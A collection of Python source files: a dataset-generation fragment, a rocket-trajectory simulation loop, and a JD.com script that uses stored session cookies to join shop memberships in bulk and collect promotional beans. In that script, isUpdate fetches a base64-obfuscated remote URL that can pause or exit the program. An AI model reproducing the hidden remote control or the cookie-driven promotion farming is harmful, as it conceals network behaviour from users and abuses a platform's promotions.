parser = argparse.ArgumentParser(description='Generate Wikisum dataset from given URLs and Wikipedia descriptions.')
parser.add_argument('--workers', help='number of threads to perform web searchs in parallel', default=1, type=int)
parser.add_argument('--batch_size', help='batch of articles between storages', default=10, type=int)
parser.add_argument('--urls_path', default='wiki_urls_refs/', type=str)
parser.add_argument('--wiki_articles_path', default='processed_wikiextractor/', type=str)
parser.add_argument('--urls_file', default='p1p105695.json', type=str)
parser.add_argument('--output_path', default='processed_examples/pt_en_v2/', type=str)
args = parser.parse_args()
# turn-on the worker thread
for i in range(args.workers):
threading.Thread(target=worker, daemon=True).start()
main(args)
|
run_loop.py
|
import rocketsimu.simulator as simu
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import argparse
import multiprocessing
import os
import json
import numpy as np
import pandas as pd
import quaternion
from lib import kmlplot
from lib.numpy2json import NumpyEncoder
def run_simu(params, idx, foldername='tmp'):
print(f'[PID:{os.getpid()}] Start')
# Run the simulation
t, x, v, q, omega, log = simu.simulate(params, cons_out=False)
print(f'[PID:{os.getpid()}] landing XYZ:', log['landing']['x'])
log.update({'loop_id': idx})
with open(os.path.join(foldername, str(idx)+'.json'), 'w') as f:
json.dump(log, f, indent=2, cls=NumpyEncoder)
# Write the results as separate files: trajectory history (csv), parameters (json), and event log (json)
# q_float = quaternion.as_float_array(q)
trajectory = {
't': t,
'x': x[0],
'y': x[1],
'z': x[2],
'vx': v[0],
'vy': v[1],
'vz': v[2],
'qx': q[0],
'qy': q[1],
'qz': q[2],
'qw': q[3],
'wx': omega[0],
'wy': omega[1],
'wz': omega[2]
}
df = pd.DataFrame(trajectory)
df = df.set_index('t')
df.to_csv(os.path.join(foldername, str(idx)+'.csv')) # trajectory table
print(f'[PID:{os.getpid()}] End')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("config", help="Parameter file path(json format)")
parser.add_argument("azimuth", help="Number of azimuth of wind")
parser.add_argument("speed", help="range of speed of wind. [start:end:step] i.e: [0:8:1]")
parser.add_argument("out", help="output directory")
parser.add_argument("-k", "--kml", help="kml filename")
parser.add_argument("-p", "--process", help="max number of processes to be used. laptop:4~8, desktop:8~16")
args = parser.parse_args()
# Load parameters
print('Parameter file:', args.config)
with open(args.config) as f:
params = json.load(f)
# Create the output directory
if not os.path.exists(args.out):
print('output directory:', args.out, 'was not found -> creating..')
os.makedirs(args.out)
# Save the parameters into the output directory
with open(os.path.join(args.out, 'param_origin.json'), 'w') as f:
json.dump(params, f, indent=2)
# Number of processes
if args.process:
n_process = int(args.process)
else:
n_process = 1
azimuth_array = np.linspace(0, 2*np.pi, int(args.azimuth), endpoint=False)
speed_range = np.array(args.speed.split(':'), dtype='int32')
speed_array = np.arange(speed_range[0], speed_range[1], speed_range[2])
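# Example: args.speed of "0:8:1" gives speed_range [0, 8, 1] and speed_array [0, 1, ..., 7] (end value excluded)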
print('azimuth array: ', azimuth_array)
print('speed array:', speed_array)
proc = []
idx = 0
for speed in speed_array:
# Parallelize over wind directions, one process per direction (on a laptop this can slow down other software)
for azimuth in azimuth_array:
wind_std = [-speed * np.sin(azimuth), -speed * np.cos(azimuth), 0]
params['wind_parameters']['wind_std'] = wind_std
p = multiprocessing.Process(target=run_simu, args=(params, idx, args.out))
proc.append(p)
p.start()
idx += 1
# Drop processes that have already finished (popping while iterating would skip entries)
proc = [p_ for p_ in proc if p_.is_alive()]
# If the number of running processes has reached the limit, wait for one to finish
if len(proc) >= n_process:
# Wait until any one process finishes
loopf=True
while loopf:
for i, _p in enumerate(proc):
if not _p.is_alive():
proc.pop(i)
loopf=False
break
# Wait for all remaining processes to finish
for p in proc:
p.join()
proc = []
if args.kml:
# Read the Izu launch-site regulation information
with open('location_parameters/izu.json') as f:
regulations = json.load(f)
idx=0
scatter = np.zeros((len(speed_array), len(azimuth_array)+1, 2))
for r, speed in enumerate(speed_array):
for theta, azimuth in enumerate(azimuth_array):
wind_std = [-speed * np.sin(azimuth), -speed * np.cos(azimuth), 0]
with open(os.path.join(args.out, str(idx)+'.json')) as f:
data = json.load(f)
scatter[r, theta] = np.array(data['landing']['x'])[:2]
idx += 1
scatter[r, -1] = scatter[r, 0] # close the loop: join the end of the ellipse back to its start
print('scatter:', scatter)
for item in regulations:
if item['name'] == 'rail':
latlon = item['center']
print('lat lon:', latlon)
kmlplot.output_kml(scatter, latlon, speed_array, regulations, os.path.join(args.out, args.kml))
|
jd_OpenCard.py
|
#!/bin/env python3
# -*- coding: utf-8 -*
'''
Project name: JD_OpenCard
Author: Curtin
Purpose: join JD shop membership ("open card") programs to collect JD beans
CreateDate: 2021/5/4 1:47 PM
UpdateTime: 2021/6/19
Suggested cron: 2 8,15 * * * python3 jd_OpenCard.py
new Env('开卡有礼');
'''
version = 'v1.2.2'
readmes = """
# JD入会领豆小程序

## 使用方法
#### [手机用户(参考) https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw](https://mp.weixin.qq.com/s/ih6aOURXWM-iKrhvMyR3mw)
#### [PC用户 (参考) https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A](https://mp.weixin.qq.com/s/JmLxAecZAlEc4L2sZWnn1A)
#### [v4-bot用户 (参考) https://github.com/curtinlv/JD-Script/pull/12#issue-652134788](https://github.com/curtinlv/JD-Script/pull/12#issue-652134788)
## 目录结构
JD-Script/ #仓库
|-- LICENSE
|-- OpenCard # 主目录
| |-- jd_OpenCard.py # 主代码 (必要)
| |-- log # 临时目录(可删除)
| |-- OpenCardConfig.ini # 只配置文件(必要)
| |-- Readme.md # 说明书
| `-- start.sh # shell脚本(非必要)
`-- README.md
log目录结构、临时目录(可删除):
log
├── memory.json # 记忆、统计功能临时存放参数
├── shopid-2021-05-23.txt # 记录所有送豆的shopid
├── 入会N豆以上的shopid-2021-05-23.txt # 记录满足入会条件的shopid
├── 入会汇总.txt # 记录所有入会店铺送豆的加入、注销链接
├── 可退会账号【账号id】.txt # 记录跑脚本之前已经过入会且目前送豆的注销链接(可优先退会)
### `【兼容环境】`
1.Python3.3+ 环境
2.兼容ios设备软件:Pythonista 3、Pyto(已测试正常跑,其他软件自行测试)
3.Windows exe
安装依赖模块 :
pip3 install requests
执行:
python3 jd_OpenCard.py
start.sh 脚本运行方法:
1.适合定时任务或不想依赖ini配置文件。
2.支持单号跑多开,如
cp start.sh start_2.sh
sh start_2.sh #只跑里面配置的参数,如cookie
3.定时任务(参考):
0 8 * * * sh /home/curtin/JD-Script/OpenCard/start.sh
2 8 * * * sh /home/curtin/JD-Script/OpenCard/start_2.sh
## `【更新记录】`
2021.6.19: (v1.2.2)
* 修复多线程报错
2021.6.14: (v1.2.1)
* 新增单双线程控制
* 修复一些问题,如腾讯云跑异常报错。
2021.5.28:(v1.2.0)
* 新增单或多账号并发
- Concurrent=yes #开启
* 新增企业微信、Bark推送
* 优化一些逻辑
- 如随机账号查询礼包,仅开启单账号时候
- 京豆统计
2021.5.23:(v1.1.1)
* 修复一些问题及优化一些代码
* 修复Env环境读取变量问题
* 新增 start.sh 运行脚本(可Env环境使用)
- 运行方式 sh start.sh
2021.5.21:(v1.1.0)
* 修复一些问题及优化一些代码:
- 修复最后统计显示为0,新增开卡个数统计
- 修复记忆功能一些bug
- 等等一些小问题
* 新增机器人通知
- 开启远程shopid、配合crontab 坐等收豆
2021.5.15:(v1.0.5)
* 新增远程获取shopid功能
- isRemoteSid=yes #开启
* 修改已知Bug
2021.5.9:(v1.0.4 Beta)
* 优化代码逻辑
* 打包exe版本测试
2021.5.8:(v1.0.3)
* 优化记忆功能逻辑:
- cookiek个数检测
- shopid个数检测
- 上一次中断最后记录的账号id检测不存在本次ck里面
- 临时文件log/memory.json是否存在
- 以上任意一条命中则记忆接力功能不生效。
2021.5.7:(v1.0.2)
* 优化代码逻辑
* 修复已知Bug
2021.5.5:(v1.0.1)
* 新增记忆功能,如中断后下次跑会接着力跑(默认开启)
- memory= True
* 新增仅记录shopid,不入会功能(默认关闭)
- onlyRecord = no
* 修复已知Bug
2021.5.4:(v1.0.0)
* 支持多账号
- JD_COOKIE=pt_key=xxx;pt_pin=xxx;&pt_key=xxx;pt_pin=xxx; #多账号&分隔
* 限制京豆数量入会,例如只入50豆以上
- openCardBean = 50
* 双线程运行
- 默认开启,且您没得选择。
* 记录满足条件的shopid 【record= True】默认开启 (./log 目录可删除)
- log/可销卡汇总.txt #记录开卡送豆的店铺销卡链接
- log/shopid-yyyy-mm-dd.txt #记录当天所有入会送豆的shopid
- log/可销卡账号xxx.txt #记录账号可销卡的店铺
### `【账号参数配置说明】`
### 主配置文件[ OpenCardConfig.ini ] 请保持utf-8默认格式
变量 | 值 | 说明
---- | ----- | ------
JD_COOKIE | pt_key=xxx;pt_pin=xxx; | 必要(多账号&分隔)
openCardBean | 30 | int,入会送豆满足此值,否则不入会
record | False或True | 布尔值,是否记录符合条件的shopid(默认True)
onlyRecord | False或True |布尔值, True:仅记录,不入会(默认False)
memory | False或True | 布尔值,开启记忆功能,接力上一次异常中断位置继续。(默认yes)
printlog | False或True | 布尔值,True:只打印部分日志 False:打印所有日志
sleepNum | False或True | Float,限制速度,单位秒,如果请求过快报错适当调整0.5秒以上
isRemoteSid | False或True | 布尔值,True:使用作者远程仓库更新的id,False:使用本地shopid.txt的id
#### 兼容Env环境(如有配置则优先使用,适合AC、云服务环境等)
export JD_COOKIE='pt_key=xxx;pt_pin=xxx;' (多账号&分隔)
export openCardBean=30
export xxx=xxx
#### Ps:您可以到以下途径获取最新的shopid.txt,定期更新:
###### [GitHub仓库 https://github.com/curtinlv/JD-Script](https://github.com/curtinlv/JD-Script)
###### [Gitee仓库 https://gitee.com/curtinlv/JD-Script](https://gitee.com/curtinlv/JD-Script)
###### [TG频道 https://t.me/TopStyle2021](https://t.me/TopStyle2021)
###### [TG群 https://t.me/topStyle996](https://t.me/topStyle996)
###### 关注公众号【TopStyle】回复:shopid

#
@Last Version: %s
@Last Time: 2021-06-19 13:55
@Author: Curtin
#### **仅以学习交流为主,请勿商业用途、禁止违反国家法律 ,转载请留个名字,谢谢!**
# End.
[回到顶部](#readme)
""" % version
################################ 【Main】################################
import time, os, sys, datetime
import requests
import random, string
import re, json, base64
from urllib.parse import unquote, quote_plus
from threading import Thread
from configparser import RawConfigParser
# Define some parameters used below
requests.packages.urllib3.disable_warnings()
scriptHeader = """
════════════════════════════════════════
║ ║
║ JD 入 会 领 豆 ║
║ ║
════════════════════════════════════════
@Version: {}""".format(version)
remarks = '\n\n\tTG交流 : https://t.me/topstyle996\n\n\tTG频道 : https://t.me/TopStyle2021\n\n\t公众号 : TopStyle\n\n\t\t\t--By Curtin\n'
timestamp = int(round(time.time() * 1000))
today = datetime.datetime.now().strftime('%Y-%m-%d')
# Get the current working directory
pwd = os.path.dirname(os.path.abspath(__file__)) + os.sep
######
openCardBean = 0
sleepNum = 0.0
record = True
onlyRecord = False
memory = True
printlog = True
isRemoteSid = True
Concurrent = True
TG_BOT_TOKEN = ''
TG_USER_ID = ''
PUSH_PLUS_TOKEN = ''
TG_PROXY_IP = ''
TG_PROXY_PORT = ''
TG_API_HOST = ''
QYWX_AM = ''
BARK = ''
DoubleThread = True
# Load account configuration
try:
configinfo = RawConfigParser()
try:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
except Exception as e:
with open(pwd + "OpenCardConfig.ini", "r", encoding="UTF-8") as config:
getConfig = config.read().encode('utf-8').decode('utf-8-sig')
with open(pwd + "OpenCardConfig.ini", "w", encoding="UTF-8") as config:
config.write(getConfig)
try:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="UTF-8")
except:
configinfo.read(pwd + "OpenCardConfig.ini", encoding="gbk")
cookies = configinfo.get('main', 'JD_COOKIE')
openCardBean = configinfo.getint('main', 'openCardBean')
sleepNum = configinfo.getfloat('main', 'sleepNum')
record = configinfo.getboolean('main', 'record')
onlyRecord = configinfo.getboolean('main', 'onlyRecord')
memory = configinfo.getboolean('main', 'memory')
printlog = configinfo.getboolean('main', 'printlog')
isRemoteSid = configinfo.getboolean('main', 'isRemoteSid')
TG_BOT_TOKEN = configinfo.get('main', 'TG_BOT_TOKEN')
TG_USER_ID = configinfo.get('main', 'TG_USER_ID')
PUSH_PLUS_TOKEN = configinfo.get('main', 'PUSH_PLUS_TOKEN')
TG_PROXY_IP = configinfo.get('main', 'TG_PROXY_IP')
TG_PROXY_PORT = configinfo.get('main', 'TG_PROXY_PORT')
TG_API_HOST = configinfo.get('main', 'TG_API_HOST')
QYWX_AM = configinfo.get('main', 'QYWX_AM')
Concurrent = configinfo.getboolean('main', 'Concurrent')
DoubleThread = configinfo.getboolean('main', 'DoubleThread')
BARK = configinfo.get('main', 'BARK')
except Exception as e:
OpenCardConfigLabel = 1
print("参数配置有误,请检查OpenCardConfig.ini\nError:", e)
print("尝试从Env环境获取!")
def getBool(label):
try:
if label == 'True' or label == 'yes' or label == 'true' or label == 'Yes':
return True
elif label == 'False' or label == 'no' or label == 'false' or label == 'No':
return False
else:
return True
except Exception as e:
print(e)
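# Example: getBool('yes') -> True, getBool('no') -> False; any other string falls back to True.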
# Environment variables take precedence when present (suitable for AC, cloud services, etc.)
# JD_COOKIE=cookie (separate multiple accounts with &)
if "JD_COOKIE" in os.environ:
if len(os.environ["JD_COOKIE"]) > 10:
cookies = os.environ["JD_COOKIE"]
print("已获取并使用Env环境 Cookie")
# Only join when the bean reward exceeds this value
if "openCardBean" in os.environ:
if len(os.environ["openCardBean"]) > 0:
openCardBean = int(os.environ["openCardBean"])
print("已获取并使用Env环境 openCardBean:", openCardBean)
elif not openCardBean:
openCardBean = 0
# Whether to enable double threading
if "DoubleThread" in os.environ:
if len(os.environ["DoubleThread"]) > 1:
DoubleThread = getBool(os.environ["DoubleThread"])
print("已获取并使用Env环境 DoubleThread", DoubleThread)
# Multi-account concurrency
if "Concurrent" in os.environ:
if len(os.environ["Concurrent"]) > 1:
Concurrent = getBool(os.environ["Concurrent"])
print("已获取并使用Env环境 Concurrent", Concurrent)
elif not Concurrent:
Concurrent = True
# Rate limit in seconds; if requests fail from going too fast, raise this to 0.5s or more
if "sleepNum" in os.environ:
if len(os.environ["sleepNum"]) > 0:
sleepNum = float(os.environ["sleepNum"])
print("已获取并使用Env环境 sleepNum:", sleepNum)
elif not sleepNum:
sleepNum = 0
if "printlog" in os.environ:
if len(os.environ["printlog"]) > 1:
printlog = getBool(os.environ["printlog"])
print("已获取并使用Env环境 printlog:", printlog)
elif not printlog:
printlog = True
# Whether to record matching shopids to the output file [OpenCardlog/yes_shopid.txt]  False|True
if "record" in os.environ:
if len(os.environ["record"]) > 1:
record = getBool(os.environ["record"])
print("已获取并使用Env环境 record:", record)
elif not record:
record = True
# Record only, do not join; output file for shopids whose membership gives beans
if "onlyRecord" in os.environ:
if len(os.environ["onlyRecord"]) > 1:
onlyRecord = getBool(os.environ["onlyRecord"])
print("已获取并使用Env环境 onlyRecord:", onlyRecord)
elif not onlyRecord:
onlyRecord = False
# Enable the memory feature; only takes effect when record=True and memory=True
if "memory" in os.environ:
if len(os.environ["memory"]) > 1:
memory = getBool(os.environ["memory"])
print("已获取并使用Env环境 memory:", memory)
elif not memory:
memory = True
# Whether to use the remote shopid list
if "isRemoteSid" in os.environ:
if len(os.environ["isRemoteSid"]) > 1:
isRemoteSid = getBool(os.environ["isRemoteSid"])
print("已获取并使用Env环境 isRemoteSid:", isRemoteSid)
elif not isRemoteSid:
isRemoteSid = True
# Get TG_BOT_TOKEN
if "TG_BOT_TOKEN" in os.environ:
if len(os.environ["TG_BOT_TOKEN"]) > 1:
TG_BOT_TOKEN = os.environ["TG_BOT_TOKEN"]
print("已获取并使用Env环境 TG_BOT_TOKEN")
# Get TG_USER_ID
if "TG_USER_ID" in os.environ:
if len(os.environ["TG_USER_ID"]) > 1:
TG_USER_ID = os.environ["TG_USER_ID"]
print("已获取并使用Env环境 TG_USER_ID")
# Get the proxy IP
if "TG_PROXY_IP" in os.environ:
if len(os.environ["TG_PROXY_IP"]) > 1:
TG_PROXY_IP = os.environ["TG_PROXY_IP"]
print("已获取并使用Env环境 TG_PROXY_IP")
# Get the TG proxy port
if "TG_PROXY_PORT" in os.environ:
if len(os.environ["TG_PROXY_PORT"]) > 1:
TG_PROXY_PORT = os.environ["TG_PROXY_PORT"]
print("已获取并使用Env环境 TG_PROXY_PORT")
elif not TG_PROXY_PORT:
TG_PROXY_PORT = ''
# Get TG_API_HOST
if "TG_API_HOST" in os.environ:
if len(os.environ["TG_API_HOST"]) > 1:
TG_API_HOST = os.environ["TG_API_HOST"]
print("已获取并使用Env环境 TG_API_HOST")
# Get pushplus PUSH_PLUS_TOKEN
if "PUSH_PLUS_TOKEN" in os.environ:
if len(os.environ["PUSH_PLUS_TOKEN"]) > 1:
PUSH_PLUS_TOKEN = os.environ["PUSH_PLUS_TOKEN"]
print("已获取并使用Env环境 PUSH_PLUS_TOKEN")
# Get the WeCom (enterprise WeChat) app push token QYWX_AM
if "QYWX_AM" in os.environ:
if len(os.environ["QYWX_AM"]) > 1:
QYWX_AM = os.environ["QYWX_AM"]
print("已获取并使用Env环境 QYWX_AM")
# Get the Bark push token BARK
if "BARK" in os.environ:
if len(os.environ["BARK"]) > 1:
BARK = os.environ["BARK"]
print("已获取并使用Env环境 BARK")
# Check that the cookies parameter exists
try:
cookies
except NameError as e:
var_exists = False
print("[OpenCardConfig.ini] 和 [Env环境] 都无法获取到您的cookies,请配置!\nError:", e)
time.sleep(60)
exit(1)
else:
var_exists = True
# Create the temporary directory
if not os.path.exists(pwd + "log"):
os.mkdir(pwd + "log")
# JSON state used by the record/memory feature
memoryJson = {}
message_info = ''
notify_mode = []
################################### Function ################################
class TaskThread(Thread):
"""
Thread class that runs a task and keeps its result
"""
def __init__(self, func, args=()):
super(TaskThread, self).__init__()
self.func = func  # the task function to run
self.args = args  # the arguments to pass in
def run(self):
self.result = self.func(*self.args)  # store the task's return value in self.result
def get_result(self):
# Returns the result of the task function; the method name does not have to be get_result.
try:
return self.result
except Exception as ex:
print(ex)
return "ERROR"
def nowtime():
return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def printinfo(context, label: bool):
if label == False:
print(context)
def exitCodeFun(code):
try:
if sys.platform == 'win32' or sys.platform == 'cygwin':
print("连按回车键即可退出窗口!")
exitCode = input()
exit(code)
except:
time.sleep(3)
exit(code)
def message(str_msg):
global message_info
print(str_msg)
message_info = "{}\n{}".format(message_info, str_msg)
sys.stdout.flush()
# Collect the enabled notification channels
if PUSH_PLUS_TOKEN:
notify_mode.append('pushplus')
if TG_BOT_TOKEN and TG_USER_ID:
notify_mode.append('telegram_bot')
if QYWX_AM:
notify_mode.append('wecom_app')
if BARK:
notify_mode.append('bark')
# Telegram notification
def telegram_bot(title, content):
try:
print("\n")
bot_token = TG_BOT_TOKEN
user_id = TG_USER_ID
if not bot_token or not user_id:
print("tg服务的bot_token或者user_id未设置!!\n取消推送")
return
print("tg服务启动")
if TG_API_HOST:
if 'http' in TG_API_HOST:
url = f"{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
else:
url = f"https://{TG_API_HOST}/bot{TG_BOT_TOKEN}/sendMessage"
else:
url = f"https://api.telegram.org/bot{TG_BOT_TOKEN}/sendMessage"
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = {'chat_id': str(TG_USER_ID), 'text': f'{title}\n\n{content}', 'disable_web_page_preview': 'true'}
proxies = None
if TG_PROXY_IP and TG_PROXY_PORT:
proxyStr = "http://{}:{}".format(TG_PROXY_IP, TG_PROXY_PORT)
proxies = {"http": proxyStr, "https": proxyStr}
try:
response = requests.post(url=url, headers=headers, params=payload, proxies=proxies).json()
except:
print('推送失败!')
if response['ok']:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
# pushplus notification
def pushplus_bot(title, content):
try:
print("\n")
if not PUSH_PLUS_TOKEN:
print("PUSHPLUS服务的token未设置!!\n取消推送")
return
print("PUSHPLUS服务启动")
url = 'http://www.pushplus.plus/send'
data = {
"token": PUSH_PLUS_TOKEN,
"title": title,
"content": content
}
body = json.dumps(data).encode(encoding='utf-8')
headers = {'Content-Type': 'application/json'}
response = requests.post(url=url, data=body, headers=headers).json()
if response['code'] == 200:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
# BARK
def bark_push(title, content):
print("\n")
if not BARK:
print("bark服务的bark_token未设置!!\n取消推送")
return
print("bark服务启动")
try:
response = requests.get('''https://api.day.app/{0}/{1}/{2}'''.format(BARK, title, quote_plus(content))).json()
if response['code'] == 200:
print('推送成功!')
else:
print('推送失败!')
except Exception as e:
print(e)
print('Bark推送失败!')
def send(title, content):
"""
使用 bark, telegram bot, dingding bot, serverJ 发送手机推送
:param title:
:param content:
:return:
"""
content = content + "\n\n" + footer
for i in notify_mode:
if i == 'telegram_bot':
if TG_BOT_TOKEN and TG_USER_ID:
telegram_bot(title=title, content=content)
else:
print('未启用 telegram机器人')
continue
elif i == 'pushplus':
if PUSH_PLUS_TOKEN:
pushplus_bot(title=title, content=content)
else:
print('未启用 PUSHPLUS机器人')
continue
elif i == 'wecom_app':
if QYWX_AM:
wecom_app(title=title, content=content)
else:
print('未启用企业微信应用消息推送')
continue
elif i == 'bark':
if BARK:
bark_push(title=title, content=content)
else:
print('未启用Bark APP应用消息推送')
continue
else:
print('此类推送方式不存在')
# WeCom app push
def wecom_app(title, content):
try:
if not QYWX_AM:
print("QYWX_AM 并未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(',', QYWX_AM)
if not 4 <= len(QYWX_AM_AY) <= 5:  # QYWX_AM must have 4 or 5 comma-separated fields
print("QYWX_AM 设置错误!!\n取消推送")
return
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except:
media_id = ''
wx = WeCom(corpid, corpsecret, agentid)
# If media_id is not configured, send as plain text by default
if not media_id:
message = title + '\n\n' + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == 'ok':
print('推送成功!')
else:
print('推送失败!错误信息如下:\n', response)
except Exception as e:
print(e)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'
values = {'corpid': self.CORPID,
'corpsecret': self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {
"content": message
},
"safe": "0"
}
send_msges = (bytes(json.dumps(send_values), 'utf-8'))
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace('\n', '<br/>'),
"digest": message
}
]
}
}
send_msges = (bytes(json.dumps(send_values), 'utf-8'))
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
# Check that the cookie format is correct
def iscookie():
"""
:return: cookiesList,userNameList,pinNameList
"""
cookiesList = []
userNameList = []
pinNameList = []
if 'pt_key=' in cookies and 'pt_pin=' in cookies:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
result = r.findall(cookies)
if len(result) >= 1:
message("您已配置{}个账号".format(len(result)))
u = 1
for i in result:
r = re.compile(r"pt_pin=(.*?);")
pinName = r.findall(i)
pinName = unquote(pinName[0])
# get the account nickname
ck, nickname = getUserInfo(i, pinName, u)
if nickname != False:
cookiesList.append(ck)
userNameList.append(nickname)
pinNameList.append(pinName)
else:
u += 1
continue
u += 1
if len(cookiesList) > 0 and len(userNameList) > 0:
return cookiesList, userNameList, pinNameList
else:
message("没有可用Cookie,已退出")
exitCodeFun(3)
else:
message("cookie 格式错误!...本次操作已退出")
exitCodeFun(4)
else:
message("cookie 格式错误!...本次操作已退出")
exitCodeFun(4)
# Check for a newer version
def gettext(url):
try:
resp = requests.get(url, timeout=60).text
if '该内容无法显示' in resp:
return gettext(url)
return resp
except Exception as e:
print(e)
def isUpdate():
global footer, readme1, readme2, readme3, uPversion
url = base64.decodebytes(
b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvdXBkYXRlLmpzb24=")
try:
result = gettext(url)
result = json.loads(result)
isEnable = result['isEnable']
uPversion = result['version']
info = result['info']
readme1 = result['readme1']
readme2 = result['readme2']
readme3 = result['readme3']
pError = result['m']
footer = result['footer']
getWait = result['s']
if isEnable > 50 and isEnable < 150:
if version != uPversion:
print(f"\n当前最新版本:【{uPversion}】\n\n{info}\n")
message(f"{readme1}{readme2}{readme3}")
time.sleep(getWait)
else:
message(f"{readme1}{readme2}{readme3}")
time.sleep(getWait)
else:
print(pError)
time.sleep(300)
exit(666)
except:
message("请检查您的环境/版本是否正常!")
time.sleep(10)
exit(666)
def getUserInfo(ck, pinName, userNum):
url = 'https://me-api.jd.com/user_new/info/GetJDUserInfoUnion?orgFlag=JD_PinGou_New&callSource=mainorder&channel=4&isHomewhite=0&sceneval=2&sceneval=2&callback=GetJDUserInfoUnion'
headers = {
'Cookie': ck,
'Accept': '*/*',
'Connection': 'close',
'Referer': 'https://home.m.jd.com/myJd/home.action',
'Accept-Encoding': 'gzip, deflate, br',
'Host': 'me-api.jd.com',
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1',
'Accept-Language': 'zh-cn'
}
try:
resp = requests.get(url=url, verify=False, headers=headers, timeout=60).text
r = re.compile(r'GetJDUserInfoUnion.*?\((.*?)\)')
result = r.findall(resp)
userInfo = json.loads(result[0])
nickname = userInfo['data']['userInfo']['baseInfo']['nickname']
return ck, nickname
except Exception:
context = f"账号{userNum}【{pinName}】Cookie 已失效!请重新获取。"
message(context)
send("【JD入会领豆】Cookie 已失效!", context)
return ck, False
# Build request headers
def setHeaders(cookie, intype):
if intype == 'mall':
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Host": "mall.jd.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15",
"Accept-Language": "zh-cn",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "close"
}
return headers
elif intype == 'JDApp':
headers = {
'Cookie': cookie,
'Accept': "*/*",
'Connection': "close",
'Referer': "https://shopmember.m.jd.com/shopcard/?",
'Accept-Encoding': "gzip, deflate, br",
'Host': "api.m.jd.com",
'User-Agent': "jdapp;iPhone;9.4.8;14.3;809409cbd5bb8a0fa8fff41378c1afe91b8075ad;network/wifi;ADID/201EDE7F-5111-49E8-9F0D-CCF9677CD6FE;supportApplePay/0;hasUPPay/0;hasOCPay/0;model/iPhone13,4;addressid/;supportBestPay/0;appBuild/167629;jdSupportDarkMode/0;Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148;supportJDSHWK/1",
'Accept-Language': "zh-cn"
}
return headers
elif intype == 'mh5':
headers = {
'Cookie': cookie,
'Accept': "*/*",
'Connection': "close",
'Referer': "https://shopmember.m.jd.com/shopcard/?",
'Accept-Encoding': "gzip, deflate, br",
'Host': "api.m.jd.com",
'User-Agent': "Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1",
'Accept-Language': "zh-cn"
}
return headers
# Record matching shopids to a local file: OpenCardlog/shopid-yyyy-mm-dd.txt or log-yyyy-mm-dd.txt
def outfile(filename, context, iscover):
"""
:param filename: file name, txt format by default
:param context: content to write
:param iscover: whether to overwrite, False or True
:return:
"""
if record == True:
try:
if iscover == False:
with open(pwd + "log/{0}".format(filename), "a+", encoding="utf-8") as f1:
f1.write("{}\n".format(context))
f1.close()
elif iscover == True:
with open(pwd + "{0}".format(filename), "w+", encoding="utf-8") as f1:
f1.write("{}".format(context))
f1.close()
except Exception as e:
print(e)
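# Note: nothing is written unless record is True. With iscover=False the line is appended under
# log/<filename>; with iscover=True the file is rewritten in the script directory itself (not under log/).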
# Memory feature (double-thread layout by default)
def memoryFun(startNum, threadNum, usernameLabel, username, getallbean, userCount):
global memoryJson
if memory == True:
if usernameLabel == True:
memoryJson['allShopidNum'] = endShopidNum
memoryJson['currUser{}'.format(threadNum)] = username
memoryJson['t{}_startNum'.format(threadNum)] = startNum
memoryJson['allUserCount'] = userCount
if usernameLabel == False:
try:
memoryJson['{}'.format(username)]
memoryJson['{}'.format(username)] += getallbean
except:
memoryJson['{}'.format(username)] = getallbean
try:
memoryJson['{}_ok'.format(username)]
memoryJson['{}_ok'.format(username)] += 1
except:
memoryJson['{}_ok'.format(username)] = 1
try:
if os.path.exists(pwd + "log"):
with open(pwd + "log/memory.json", "w+", encoding="utf-8") as f:
json.dump(memoryJson, f, indent=4)
else:
pass
except Exception as e:
print(e)
